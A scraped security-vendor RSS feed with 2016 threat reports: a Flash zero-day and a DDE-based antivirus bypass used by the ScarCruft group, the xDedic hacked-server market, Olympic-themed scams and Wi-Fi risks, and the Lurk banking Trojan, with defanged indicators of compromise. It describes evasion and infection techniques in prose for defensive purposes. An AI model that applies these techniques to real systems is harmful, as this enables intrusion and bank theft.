Malware RSS Feed

Operation Daybreak

Malware Alerts - Fri, 06/17/2016 - 02:00

Earlier this year, we deployed new technologies in Kaspersky Lab products to identify and block zero-day attacks. This technology already proved its effectiveness earlier this year, when it caught an Adobe Flash zero day exploit (CVE-2016-1010). Earlier this month, our technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks. We believe the attacks are launched by an APT Group we track under the codename “ScarCruft”.

ScarCruft is a relatively new APT group; victims have been observed in Russia, Nepal, South Korea, China, India, Kuwait and Romania. The group has several ongoing operations, utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer.

Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit. It is also possible that the group deployed another zero day exploit, CVE-2016-0147, which was patched in April.

This exploit caught by our technologies highlights a few very interesting evasion methods, some of which we haven’t seen before. We describe them below.

Operation Daybreak general information

Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails. To date, we have observed more than two dozen victims for these attacks.

Although the exact attack vector remains unknown, the targets appear to receive a malicious link which points to a hacked website where the exploitation kit is hosted. The hacked web server hosting the exploit kit is associated with the ScarCruft APT and used in another line of attacks. Certain details, such as using the same infrastructure and targeting, make us believe that Operation Daybreak is being done by the ScarCruft APT group.

The ScarCruft APT group is a relatively new player and managed to stay under the radar for some time. In general, their work is very professional and focused. Their tools and techniques are well above the average. Prior to the discovery of Operation Daybreak, we observed the ScarCruft APT launching a series of attacks in Operation Erebus. Operation Erebus leverages another Flash Player exploit (CVE-2016-4117) through the use of watering hole attacks.

In the case of Operation Daybreak, the hacked website hosting the exploit kit performs a couple of browser checks before redirecting the visitor to a server controlled by the attackers hosted in Poland.

The main exploit page script contains a BASE64 decoder, as well as rc4 decryption implemented in JS.

The parameters sent to the “ap.php” script are randomly generated on each hit, so the second stage payload gets encrypted differently each time. This prevents easy detection by MD5 or signatures of the second stage payload.

The exploitation process consists of three Flash objects. The Flash object that triggers the vulnerability in Adobe Flash Player is located in second SWF delivered to the victim.

At the end of the exploitation chain, the server sends a legitimate PDF file to user – “china.pdf”. The “china.pdf” file shown to the victims in the last stage of the attack seems to be written in Korean:

Decoy document shown to victims

The document text talks about disagreements between China and “The North” over nuclear programs and demilitarization.

Vulnerability technical details

The vulnerability (CVE-2016-4171) is located in the code which parses the ExecPolicy metadata information.

This is what the structure looks like:

This structure also contains an array of item_info structures:

The documentation says the following about these structures:

“The item_info entry consists of item_count elements that are interpreted as key/value pairs of indices into the string table of the constant pool. If the value of key is zero, this is a keyless entry and only carries a value.”

In the exploit used by the ScarCruft group, we have the following item_info structures:

Item_info array in exploit object

The code that triggers the vulnerability parses this structure and, for every key and value members, tries to get the respective string object from string constant pool. The problem relies on the fact that the “.key” and “.value” members are used as indexes without any kind of boundary checks. It is easy to understand that if key or value members are larger than string constant pool array, a memory corruption problem appears. It is also important to mention that this member’s (value, key) are directly read from SWF object, so an attacker can easily use them to implement arbitrary read/write operations.

Getting object by index from constant pool without any checks

Using this vulnerability, the exploit implements a series of writes at specified addresses to achieve full remote code execution.

Bypassing security solutions through DDE

The Operation Daybreak attack employs multiple stages, which are all outstanding in some way. One of them attracted our attention because it implements a bypass for security solutions we have never seen before.

In the first stage of the attack, the decrypted shellcode executed by the exploit downloads and executes a special DLL file. This is internally called “yay_release.dll”:

Second stage DLL internal name and export

The code of this module is loaded directly into the exploited application and has several methods of payload execution. One of method uses a very interesting technique of payload execution which is designed mostly to bypass modern anti-malware products. This uses an interesting bug in the Windows DDE component. It is not a secret that anti-malware systems trigger on special system functions that are called in the context of potential vulnerable applications to make a deeper analysis of API calls such as CreateProcess, WinExec or ShellExecute.

For instance, such defense technologies trigger if a potentially vulnerable application such as Adobe Flash starts other untrusted applications, scripts interpreters or even the command console.

To make execution of payload invisible for these defense systems, the threat actors used the Windows DDE interface in a very clever way. First, they register a special window for it:

In the window procedure, they post WM_DDE_EXECUTE messages with commands:

Sending WM_DDE_EXECUTE message to window

The attackers used the following commands:

The main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed. This is an undocumented behavior in Microsoft Windows.

In our case, a malicious VBS was executed, which installs a next stage payload stored in CAB file:

Malicious VBS used in the attack

We have reported this “creative” abuse of DDE to Microsoft’s security team.

The final payload of the attack is a CAB file with the following MD5:

  • 8844a537e7f533192ca8e81886e70fbc

The MS CAB file (md5: 8844a537e7f533192ca8e81886e70fbc) contains 4 malicious DLL files:

MD5 Filename a6f14b547d9a7190a1f9f1c06f906063 cfgifut.dll e51ce28c2e2d226365bc5315d3e5f83e cldbct.dll 067681b79756156ba26c12bc36bf835c cryptbase.dll f8a2d4ddf9dc2de750c8b4b7ee45ba3f msfte.dll

The file cldbct.dll (e51ce28c2e2d226365bc5315d3e5f83e) connects to the following C2:

  • hXXp://webconncheck.myfw[.]us:8080/8xrss.php

The modules are signed by an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited” with serial numbers, copied from real Tencent certificates:

  • 5d 06 88 f9 04 0a d5 22 87 fc 32 ad ec eb 85 b0
  • 71 70 bd 93 cf 3f 18 9a e6 45 2b 51 4c 49 34 0e

Invalid digital signature on malware samples

The malware deployed in this attack is extremely rare and apparently reserved only for high profile victims. Our products detect it as well as other malware from ScarCruft as HEUR:Trojan.Win32.ScarCruft.gen.


Although our visibility is rather limited, some of the victims of these attacks include:

  • A law enforcement agency in an Asian country
  • One of the largest trading companies in Asia and in the world
  • A mobile advertising and app monetization company in the USA
  • Individuals related to the International Association of Athletics Federations
  • A restaurant located in one of the top malls in Dubai

Some of these were compromised over the last few days, indicating the attackers are still very active.


Nowadays, in-the-wild Flash Player exploits are becoming rare. This is because in most cases they need to be coupled with a Sandbox bypass exploit, which makes them rather tricky.

Additionally, Adobe has been doing a great job at implementing new mitigations to make exploitation of Flash Player more and more difficult.

Nevertheless, resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets.

As usual, the best defense against targeted attacks is a multi-layered approach. Windows users should combine traditional anti-malware technologies with patch management, host intrusion detection and, ideally, whitelisting and default-deny strategies. According to a study by the Australian DSD, 85% of the targeted attacks analysed could have been stopped by four simple defense strategies. While it’s impossible to achieve 100% protection, in practice and most cases all you have to do is increase your defenses to the point where it becomes too expensive for the attacker – who will just give up and move on to other targets.

Kaspersky products detect flash exploit as HEUR:Exploit.SWF.Agent.gen also our AEP (Automatic Exploit Prevention) component can successfully detect this attack. Payloads are detected with HEUR:Trojan.Win32.ScarCruft.gen verdict.

* More information about the ScarCruft APT group is available to customers of Kaspersky Intelligent Services.

Indicators of compromise: Malicious IPs and hostnames:
  • 212.7.217[.]10
  • reg.flnet[.]org
  • webconncheck.myfw[.]us


xDedic – the shady world of hacked servers for sale

Malware Alerts - Wed, 06/15/2016 - 06:59

Over the last two years, deep in the slums of the Internet, a different kind of underground market has flourished.

The short, cryptic name perhaps doesn’t say much about it: xDedic. However, on this obscure marketplace anyone can purchase more than 70,000 hacked servers from all around the Internet.

xDedic forum login

From government networks to corporations, from web servers to databases, xDedic provides a marketplace for buyers to find anything. And the best thing about it – it’s cheap! Purchasing access to a server located in a European Union country government network can cost as little as $6.

The one-time cost gives a malicious buyer access to all the data on the server and the possibility to use this access to launch further attacks. It is a hacker’s dream, simplifying access to victims, making it cheaper and faster, and opening up new possibilities for both cybercriminals and advanced threat actors.

Server purchase forum

To investigate xDedic, Kaspersky Lab teamed up with a European ISP. The research allowed us to collect data about the victims and the way the marketplace operates.

In May 2016, we counted 70,624 servers available for purchase, from 416 unique sellers in 173 affected countries. In March 2016, the number was about 55,000, a clear indication that the database of users and servers is carefully maintained and updated.

Top countries with servers on sale

Interestingly, the developers of xDedic are not selling anything themselves – instead, they have created a marketplace where a network of affiliates can sell access to compromised servers. If the truth be told, the people behind xDedic have created what appears to be a “quality” service – the forum even includes live technical support, special tools to patch hacked servers to allow multiple RDP sessions and profiling tools that upload information about the hacked servers into the xDedic database.

Top 10 sellers – May 2016

So who are the xDedic sellers listed above? We have been able to identify a very specific piece of malware (SCCLIENT) which is used by one of them, and to sinkhole its C&Cs. This provided a glimpse into the operations of one of these entities, which, based on the number of victims, we suspect is either Narko, xLeon or sirr.

SCCLIENT Trojan: victims’ information from sinkholing (first 12 hours)

The profiling software created by the xDedic developers also collects information about the software installed on the server, such as online gambling, trading and payments.

Apparently, there is strong interest in accounting, tax reporting and point-of -sale (PoS) software which open up many opportunities for fraudsters:

Spam and Attacking Tools Gambling and Financial Software POS Software

Advanced Mass Sender
Bitvise Tunnelier
DU Brute
LexisNexis Spam Soft
LexisNexis Proxifier
Spam Soft

Full Tilt Poker
iPoker Network
UltraTax 2010 (2011,..,2015)
Abacus Tax Software
CCH tax14 (tax15)
CCH Small Firm Services
ProSeries TAX (2014,2015)
ProSystem fx Tax
TAX Software
2015 Tax Praparation
Tax Management Inc.
Lacerte Tax

POS Active-Charge
POS Amigo
POS Catapult
POS Firefly
POS EasiPos
POS Revel
POS Software (Generic)
POS Toast
POS kiosk.exe
POS roi.exe
POS PTService.exe
POS pxpp.exe
POS w3wp.exe
POS DpsEftX.ocx
POS AxUpdatePortal.exe
POS callerIdserver.exe
POS XChgrSrv.exe

During our research, we counted 453 servers from 67 countries with PoS software installed:

Servers for sale with Point-of-Sale software – May 2016

For instance, a malicious user could go to the xDedic forum, register an account, top it up with Bitcoins and then purchase a number of servers which have PoS software installed. Then, they can install PoS malware, such as Backoff to harvest credit card numbers. The possibilities are truly endless.

Kaspersky Lab has reported this issue with the appropriate law enforcement agencies and is cooperating in an ongoing investigation.

To read our full report on xDedic which includes IOCs, download the xDedic Marketplace Analysis PDF here.

* For more information about Kaspersky Lab Intelligence Services, Threat Reports and custom threat analysis contact

CVE-2016-4171 – Adobe Flash Zero-day used in targeted attacks

Malware Alerts - Tue, 06/14/2016 - 14:38

Earlier today, Adobe published the security advisory APSA16-03, which describes a critical vulnerability in Adobe Flash Player version and earlier versions for Windows, Macintosh, Linux, and Chrome OS:

A few of months ago, we deployed a new set of technologies into our products designed to identify and block zero day attacks. These technologies already proved its effectiveness earlier this year, when they caught an Adobe Flash zero day exploit, CVE-2016-1010. Earlier this month, we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks.

We believe these attacks are launched by an APT Group we call “ScarCruft”.

ScarCruft is a relatively new APT group; victims have been observed in several countries, including Russia, Nepal, South Korea, China, India, Kuwait and Romania. The group has several ongoing operations utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer.

Currently, the group is engaged in two major operations: Operation Daybreak and Operation Erebus. The first of them, Operation Daybreak, appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit, focusing on high profile victims. The other one, “Operation Erebus” employs an older exploit, for CVE-2016-4117 and leverages watering holes. It is also possible that the group deployed another zero day exploit, CVE-2016-0147, which was patched in April.

We will publish more details about the attack once Adobe patches the vulnerability, which should be on June 16. Until then, we confirm that Microsoft EMET is effective at mitigating the attacks. Additionally, our products detect and block the exploit, as well as the malware used by the ScarCruft APT threat actor.

* More information about the ScarCruft APT and Operation Daybreak is available to customers of Kaspersky Intelligence Services. Contact:


IT threats during the 2016 Olympic Games in Brazil

Malware Alerts - Mon, 06/13/2016 - 07:47

Olympic threats designed to trick you

Are you planning to visit Brazil during the Olympic Games? Or watch it online? In this blog post we discuss the threats to visitors aiming to travel to Brazil to watch the games and to those planning to watch it online. In the first part we’ll talk about phishing attacks, including one against the organizers of the Games; in the second we highlight WiFi security and the results of the wardriving we did on the streets of Rio, visiting the same places as tourists and the athletes. In the third and final part we touch upon physical security that involves the usage of USB charging spots at airports, the problem of credit card cloning and ATM skimmers that will directly affect visitors to this summer’s Olympic Games in Rio.

It is clear that using the Olympic Games theme is very attractive to the bad guys. Cybercriminals always use popular sports events as bait for their attacks, as they did it in the 2014 World Cup – an event we monitored very closely due to the impressive amount of attacks registered at the time, mainly in Brazil. But the forthcoming Olympic Games has been a bit different. The number of attacks has been low, compared with the World Cup. There are many reasons to explain it one of which is that the International Olympic Committee (IOC) keeps a very active Security Operations Center (SOC), working and treating the security incidents, reporting phishing and malware campaigns. As a result, the number of “in-the-wild” attacks targeting users at this time are low.

However, the bad guys have no limit when it comes to creating new attacks. We were able to track and block several of them, such as the registration of malicious domains, fake giveaways promoted on social networks and, of course, websites selling fake tickets, using all possible ways to trick users.

The rise of bad domains

Most of the attacks start with the registration of a domain that clearly shows its malicious intent. Since the beginning of the year, we monitored the creation of new domains registered with the name of the city that will held the games. In fact, we found that the bad guys are constantly registering new creations at the start of every attack. Our blacklist contains more than 230 of these bad domains.

Several of these domains were registered via a free webmail account or use domains as protection to hide the real identity of the owner. Some of these domains are hibernating, waiting for the right moment to start an attack (especially those promising free streaming). Others were used to host fake ecommerce sites selling tickets, hosting phishing, malware, or even used to spread fake ticket giveaways. Another interesting point is that several of these domains are already using the new gTLD approved by ICANN (such as .tech and others).

The phishing phenomenon

It’s not only end-users who are targets of phishing attacks. Brazil tops the list as the most attacked country with this type of scam, and employees of the Games organization were also targeted for their potentially lucrative credentials. In February we identified a very interesting targeted campaign, on our domain monitoring system, against the IOC using the malicious domain masquerade as their Intranet portal. The purpose of the attackers was to steal credentials of IOC employees working in Brazil. The fake site looked like this when it was live and we are also aware of several other attacks including this one:

IOC employees were the target of phishing campaigns to steal credentials

The most common attacks are those that aim to phish the final user – stealing credentials is a very easy attack that even a non-skilled criminal can do. We saw phishing scams with different goals, in several colors and guises. This one was very popular in Brazil and aims to clone your credit card using the name of a Brazilian company and promising to giveaway a new car and tickets to the Games:

Free tickets and car giveaway. All fake promises.

Fake tickets, fake giveaways, real losses

As happened during the last World Cup, most of the malicious e-mails sent by the Brazilian bad guys used free tickets to watch the Games in Rio as the bait. Some of these messages also pointed to fake websites. This is a good example of a very well done campaign, promising the direct sales of tickets without applications to the official lotteries, that take place for people living in Brazil:

Why bother to participate in the official lottery when you can buy a ticket direct from a fraudster?

Other fake websites also offered tickets with a very low price, to attract people looking to buy tickets at the last hour. This website, targeting Brazilians, looks good but on closer inspection it is written in poor Portuguese:

The purpose here was to sell fake tickets with the victim paying but receiving nothing. The payment method selected by the fraudster was Brazilian boletos, a very popular payment system, used mostly for people that don’t have credit cards.

The bait to attract the attention was very low prices. The ticket to the inaugural ceremony cost U$500.00 and a match of the Brazilian National Football Team cost only U$ 50.00. Of course everything was fake:

“Watch the Male Football match paying only U$ 50,00”

Bad guys also used social media to spread their attacks. Facebook was the most used network in these cases, such as this fraudulent page announcing a fake ticket giveaway. The page is still online:

If you want to watch the games, it’s too late to buy tickets via the official channels. We do not recommend buying through unofficial markets as there is a high possibility that you are buying a pig in a poke. To make sure you don’t get caught out, the best thing is to watch the games on TV or online – but be aware of malicious streaming websites, as they will undoubtedly appear in a last ditch attempt by the bad guys to try and infect your computer and steal your data.

WiFi security

When we travel, we usually access the Internet more to help stay in touch, tweet, post status updates and share pictures. However, international data plans are usually very expensive and this is why we look for WiFi hotspots. Cybercriminals know this and every year set up fake access points or compromise legitimate WiFi networks to intercept and manipulate their victim’s browsing. Their focus for the attack is user’s passwords, credit cards and other sensitive personal information. Open and misconfigured WiFi networks are actually preferred vehicles for criminals.

To identify the extent of the problem in Brazil, we drove by three major areas of the Olympic games and passively monitored the available networks which visitors are most likely to try and use during their stay – the Brazilian Olympic Committee building, Olympic Park and the stadiums (Maracanã, Maracanãzinho and Engenhão).

Beautiful beaches, bossa nova and insecure WiFi

Running a fast recognition over two days and on the map marked with a star sign, we were able to find about 4,500 unique access points located in the aforementioned areas.

Most of the networks actually work on the 802.11n standard:

That means that most of the hardware used to build the WiFi access points is new and works especially well for multimedia streaming, reaching speeds of up to 600Mbps and working not just on 2.4Ghz and 2.5Ghz but also 5Ghz.

However, when it comes to their security, 18% of all available WiFi networks in the area are insecure and openly configured. That means that all data sent and received in such networks is not protected by any encryption access key.

We can see that additionally 7% of all networks are WPA-personal protected. That algorithm is actually obsolete today and can be broken with minimal effort. In our opinion this is especially concerning as users who connect to their “trusted” networks may believe that they are actually connecting to a secure network, when in reality it could be compromised by an attacker, who could deliver different kind of attacks to manipulate network traffic with user’s data.

So, about a quarter of all WiFi networks in the areas of the Olympic games are insecure or configured with weak encryption protocols. This means that the attackers can break them first and then develop technical circumstances to sniff victim’s navigation data and steal their sensitive data.

Is it possible to use an open WiFi network and still have a secure Internet connection? The answer is yes, however only when using a VPN connection.

We strongly recommend, regardless of any WiFi network you use while travelling, to use a VPN connection, so the data from your end-point travels to the Internet through an encrypted data channel. This way even if you work from a compromised WiFi network, the attacker might not get access to your data.

However not all VPN providers actually offer the same good service. Some of them are vulnerable to DNS leak attacks. That means that even if your immediate sensitive data is sent via VPN, your DNS queries or requests are sent in plain text to the DNS servers set by the access point hardware. In this scenario the attacker can still at least know what servers you are browsing and then, if it has access to the access point of the compromised WiFi network, can define malicious DNS servers. That would essentially mean, next time you type the name of your bank in the browser, the IP address where it goes to will be a malicious one. So, even some experienced users may become an easy victim for the attackers. There is almost no limit from the attackers’ point of view when they have control of your DNS servers.

So, before you use your VPN connection, make sure it does not have a DNS leak problem. If your VPN provider doesn’t support its own DNS servers, you might consider another VPN provider or a DNSCrypt service, so your DNS requests will make external and encrypted queries to secure DNS servers. Remember that what starts as a small security issue could have big security implications.

A simple formula must be this: any network you connect to, use your VPN connection with its own DNS servers. Don’t rely on any local settings since you can’t be sure if the WiFi access point you connect to is compromised or not.

Physical security

Another point that requires vigilance when travelling is physical security – not everything that is useful is exactly what it seems. Criminals often use tactics to deliver malicious attacks on situations where you do not necessarily think there is a risk. Let’s look at some common situations where this could happen.

USB charging spot

As mentioned before, using a mobile phone when traveling is crucial and it can be a big challenge to keep it sufficiently charged all day long. In order to help tourists, most cities are investing in charging points that can be easily found in shopping malls, airport and taxis. Most of them provide connectors for the majority of phone models as well as a USB connector that can be used with your own cable.

Charging spot provided in a Brazilian cab

Some models usually found in shopping malls and airports also provide a traditional power supply that can be used with your own charger.

Charging spot at Rio International Airport. Which one do you think is the most secure?

While connected via USB, the attacker can execute commands in order get information about the device including the model, IMEI, phone number and battery status. With that information it is possible to run an attack for the specific phone model and then successfully infect the device and collect personal information.

This doesn’t mean that we should never charge our devices when away from home, but by following these simple rules you can protect yourself from this kind of attack:

  • Always use your own charger and avoid buying one from unknown sources;
  • Use the power outlet instead of USB socket when using an unknown charging point;
  • Don’t use the charging cables at a public charging spot.
ATM skimmer

The ATM skimmer attack, also known as “Chupa-cabra” in Brazil and other countries in Latin America, is a very popular type of attack that is still being used by criminals in Brazil. From time to time a new gang appears on the news delivering this attack somewhere across the country, mainly in places commonly frequented by tourists, such as the Rio International Airport. In 2014 a gang installed 14 ATM skimmers there.

There are different types of ATM skimmers in Brazil, the most common just installs a reader for the card and a camera in order to record the password as it is typed.

An ATM skimmer which installs a camera to record the typed password

For this type of skimmer you can protect yourself by hiding the keypad while typing the password which will avoid your password from being recorded by the installed camera.

Unfortunately, this method will not help in all cases, as there is another type of skimmer where criminals replace the entire ATM, including the keypad and screen. In this case, the typed password will be stored on the fake ATM system.

ATM Skimmer which replaces the entire ATM

In order to avoid this type of attack it is important to be aware of any suspicious behavior while using the ATM.

  • Check if the green light on the card reader is on. Usually they replace the reader with a version where there is no light or it is off.
  • Before starting the transaction, check if there is anything suspicious on the ATM such as missing or badly fixed parts;
  • Hide the keypad while typing your password.
Credit Card Cloning

Unfortunately, Brazil is well known for its credit card cloning activities and it is not hard to find someone who had their card cloned while visiting the country.

Credit and debit cards are widely used in Brazil and almost everywhere accepts cards as payment methods – including street vendors. Actually most of them prefer credit card payments in order to avoid problems with the change.

Brazilian banks are referenced across the world regarding their fight against credit card cloning as well as their pioneer status in adopting chip-based cards to protect customers from this type of attack by making it much harder to clone the card. However, it was only a matter of time before Brazilian criminals would find a way to start cloning the chip-based cards, by exploiting flaws in the EMV transaction implementation.

We could see Brazilian criminals exchanging information about how to execute an attack on a chip-based card in order to extract the information and then write it back to another card using some tools.

Tool used to save the information to the smart card

It is really hard to protect yourself against this type of attack, because usually the point-of-sale is modified in order to save the information, to be collected later by the criminals. Sometimes they don’t need physical access to extract the stolen information as it is collected via bluetooth.

One good solution from the banks is SMS notifications for each transaction made using your card. Even though it does not avoid card cloning, the victim will be notified about the fraudulent transaction as soon as it happens then it can contact the bank in order to block future transactions.

To reduce the chances of having your card cloned, there are some simple steps to take:

  • Never give your card to the retailer. If for some reason they cannot bring the machine to you, you must go to the machine;
  • If the machine looks suspicious, change the payment method. It is always good to have some money with you as a back-up;
  • Before typing your PIN make sure you are on the correct payment screen and that your PIN is not going to be shown on the screen.

For everybody visiting Brazil to watch the games, we wish you safe flights and a safe stay. To our readers we wish you safe online surfing and for the Olympic athletes, may the best one win!

Lurk Banker Trojan: Exclusively for Russia

Malware Alerts - Fri, 06/10/2016 - 07:32

One piece of advice that often appears in closed message boards used by Russian cybercriminals is “Don’t work with RU”. This is a kind of instruction given by more experienced Russian criminals to the younger generation. It can be interpreted as: “don’t steal money from people in Russia, don’t infect their machines, don’t use compatriots to launder money.”

“Working with RU” is not a great idea where cybercriminals’ safety is concerned: people from other countries are unlikely to report an incident to the Russian police. In addition, online banking is not very popular in the RU zone – at least, it is much less popular than in the West. This means that the potential income from operating in the RU zone is lower than in other zones, while the risk is higher. Hence the rule “Don’t work with RU”.

As always, there are exceptions to the rule. A rather prominent banker Trojan – Lurk – that is the subject of this paper has been used to steal money from Russian residents for several years.

We have written about this banker Trojan before. It caught our attention almost as soon as it appeared because it used a fileless spreading mechanism – malicious code was not saved on the hard drive and ran in memory only. However, until now no detailed description of Lurk had been published.

What Makes the Trojan Different

The Lurk banker Trojan is in a league of its own when it comes to malware designed to steal money from bank customers:

  • Lurk has existed and actively evolved for over five years, but it works selectively – only on those computers where it can steal money. In the more than five years that it has been active, about 60,000 bots have been registered in the C&C, which is not a huge number.
  • Lurk is a versatile banker Trojan – it can steal money not only from the iBank 2 system that is used by many Russian banks but also from the unique online banking systems of some large Russian banks.
  • Lurk actively resists detection: its developers work hard to minimize detections of their Trojan, while targeted attacks make it difficult to get new samples quickly.
  • Based on the methods of internal organization used in the malware, its feature set and the frequency with which it is modified, it can be concluded that a team of professional developers and testers is working on the project.

This is not to say that the Trojan is particularly well written: we have seen and analyzed banker Trojans with much higher code quality. Moreover, our analysis of Lurk has shown that several programmers with different levels of qualification have worked on the code. The developers clearly made some bad choices in places, which have remained unfixed for years (needless to say, we are not going to alert the developers to their mistakes). It is worth noting that the malware writers are developing their product: we see that the quality of code has improved over time and the solutions chosen by the developers have generally improved. What sets Lurk apart is that it is highly targeted – the authors do their best to ensure that as many victims of interest to them as possible get infected without catching the attention of analysts or researchers. The incidents known to us make us believe that Lurk is successful at what it was designed for: we regularly receive reports of thefts from online banking systems and forensic investigations after the incidents reveal traces of Lurk on the affected machines.


The cybercriminals are interested in the following types of organizations:

  • IT organizations working in telecommunications field;
  • mass media and news aggregators;
  • banks and financial organizations.

Compromised computers of IT and telecoms companies provide the cybercriminals behind Lurk with new transfer servers through which traffic goes to the attackers’ servers. Media and news aggregator sites, particularly those visited by accountants, are used to infect a large number of users from Lurk’s ‘target audience’. Banks and financial organizations are of interest to the cybercriminals in connection with their main goal – stealing money.

We won’t comment on the reasons behind the malware authors’ attempts to get a foothold on the machines inside security agencies (these organizations are also among those targeted by Lurk).

The Trojan’s targets appear to include Russia’s four largest banks.


The well-known technique of drive-by downloads is used to distribute the Lurk banker Trojan. In addition, the cybercriminals distribute the Trojan via compromised websites with legitimate software and across corporate networks – using the psexec utility.

Infecting Using an Exploit Pack

Lurk is distributed primarily using the infamous Angler exploit pack (cybercriminals call it XXX). With this method of distribution, users don’t have to do anything in particular for their computers to become infected.

Angler is rightfully considered the flagship of exploit packs: exploits for new vulnerabilities are nearly always first implemented in Angler and only later make their way into other exploit packs (or perhaps are just borrowed’). Exploits for zero-day vulnerabilities are also often implemented in Angler, making the exploit pack particularly dangerous.

Preparation for infecting new victims with Lurk is usually performed as follows:

  1. A website that is of interest to the target audience is selected. This can be a message board for accountants, a news portal, etc.

    The website is infected by stealthily placing a link on it that leads to the exploit pack’s landing page. If it proves impossible to infect the site, a malicious link is placed into the materials of some ‘affiliate program’ that are shown on the site.

  2. Users visiting the site are redirected to the exploit pack’s landing page without their knowledge. Angler attempts to exploit some vulnerability in the software installed on the user’s computer, which should result in the execution of Lurk’s downloader – mini.

Curiously, the link to the exploit pack’s landing page is either placed for a short time or is regularly placed and removed. For example, we have seen the message board of a well-known magazine for accountants become infected. A malicious link appeared on the message board on weekdays for exactly two hours at lunchtime. Of course, we detected the anomalous activity and notified the owners of the resource. However, by the time they read our letter the resource was clean again and they could not identify the infection. At the same time, during the period when the malicious link was shown on the message board, the Lurk owners managed to infect several new user machines.

Infecting via Compromised Websites

The second method of infection that the cybercriminals used extensively is the distribution of malicious code via legitimate websites. Apparently, this distribution method involves providing infected files to users in the RU zone only, while other users get clean files.

Infecting Machines across a Corporate Network

The scheme whereby one computer in an organization is initially infected is very popular among cybercriminals. Even if the infected machine itself is of no interest to the attackers, the computer is on the same network and on the same domain with other computers containing information that the Trojan’s owners want. In such cases, the psexec utility developed by Mark Russinovich is used to distribute the malware across the network. A special mini dropper is then used to execute the Trojan’s main module on other computers on the same network. This method can result in dire consequences for the organization, since the security of a computer containing data of interest to the cybercriminals essentially depends on that of the least protected computer on the network that is under attack.

Main Modules

The Trojan consists of several modules that have reasonably rich capabilities. The main Lurk modules are:

  • mini module;
  • prescanner module;
  • core module (the bot’s kernel),
  • core_x64 module (64 bit version of the kernel);
  • mini_x64 module (64 bit version of the mini module).
The mini Module

In the first stage of an attack involving the Angler exploit pack, a vulnerability found in the user’s software is exploited and the mini module of Lurk banker Trojan is downloaded and executed. As mentioned above, the user can download the malicious file from a compromised website; another possibility is infection over the local network.

By Lurk standards, mini is a small program (100-400 KB). Its main function is to download and execute two other main Lurk modules. The address of the server used by mini is hardcoded in the program’s body. Modules are downloaded using standard GET requests. The modules downloaded by mini are encrypted, with different encryption algorithms used. The prescanner module is encrypted using the simple “xor-next” algorithm. Other modules are encrypted using the BlowFish algorithm (ECB Mode), the pseudo key for which is hardcoded into mini. The real key is created from the hardcoded pseudo key using a sequential search for one character (a brute force attack).

To avoid having to download additional modules every time mini is executed, the Trojan saves these modules in a separate encrypted file located in %APPDATA% folder. The contents of the storage is encrypted with the Blowfish algorithm, using a key that depends on the time the Windows folder was created. In addition to a plugin’s name and body, the storage file includes a list of checksums of the names of those processes in whose context the plugin is to be executed. This information is used by mini to determine which process a plugin should be injected into: for web injection modules, this is a browser process; for the ibank module, it is Java.exe, in whose context the online banking system operates.

The prescanner module

According to the operating logic of mini, the second stage of the attack is to load the prescanner module. The module is a dynamically loaded library with only one exported function – Prescan.

The cybercriminals need prescanner to make their attacks as narrowly targeted as possible. If a machine does not match the specific rules of prescanner and no online banking systems have been found on it, the module reports this to mini and the latter decides not to try to achieve persistence on the machine. In this way, the Trojan’s developers try to avoid attracting the attention of law enforcement agencies and anti-malware product developers. The following fact supports this idea: every time a new bot is registered by the C&C, a unique identifier – bot number – is assigned to the bot. In the more than five years that the banker Trojan has existed, only about 60,000 bots have been registered by the C&C.

Prescanner performs two main tasks:

  • collecting information about an infected system;
  • grabbing passwords from FTP clients found on the user’s machine.

After collecting information about the machine and checking whether its rules are observed, prescanner sends a report to its command server. In the cases that we have seen, the C&C used by prescanner was the same as that used by the mini downloader.

If it is decided that a machine is unsuitable for a Lurk attack based on the analysis performed, mini and prescanner modules terminate and uninstall themselves. If prescanner has made the decision to ensure persistence on the machine, it reports this to the mini downloader, which in turn downloads and executes the core module – the bot’s main body.

The core module

Core is the main module of Lurk. Its main functions are:

  • network interaction with the C&C;
  • executing commands received from the cybercriminals;
  • logging keypresses (keylogger function) and recording video from the infected system’s screen;
  • maintaining the encrypted data storage and Lurk settings;
  • downloading, installing and executing the Trojan’s additional modules.

The core module is a communication channel of sorts between all the other malware modules and the command server. The C&C servers used for mini and for core are different. Core does not have a hardcoded command server address. The address of its command server is calculated using DGA – the Domain Generation Algorithm. Among other DGA input parameters, the Trojan’s authors use exchange quotation data received from Yahoo Finance. This means that the data used to generate C&C addresses cannot be known to security experts in advance. As a result, it is impossible to predict the addresses generated by Lurk.

After successfully establishing a connection, data collected by the malware and the results of executing commands are sent to the command server every five minutes, with requests for new updates and commands. All communication between the core module and the C&C is encrypted – core and C&C exchange data is in the JSON format.

The function of intercepting data entered on the keyboard is implemented in the core module in the newer versions of Lurk (starting at least from 8.9773). Keypresses are intercepted only in the context of windows that have specific words/phrases in their names. The list of these words/phrases is received from the C&C. Intercepted data is sent to the command server during the next communication session (every 5 minutes).

The main part of Lurk’s storage is located in the system registry, but some additional data belonging to the storage can be saved as a file on the hard drive. As a rule, files are used to store a large but logically uniform volume of data, such as video captured from the screen or code for web injection. But in any case, links to these additional files are always present in the main part of the storage, which is located in system registry.

Additional modules

The bot’s additional modules (plugins) are downloaded by the core module to those computers the malicious program deems most suitable. Those modules that are required on a specific computer to steal money are downloaded to that computer.

The Lurk modules currently known to us are listed in the table below.

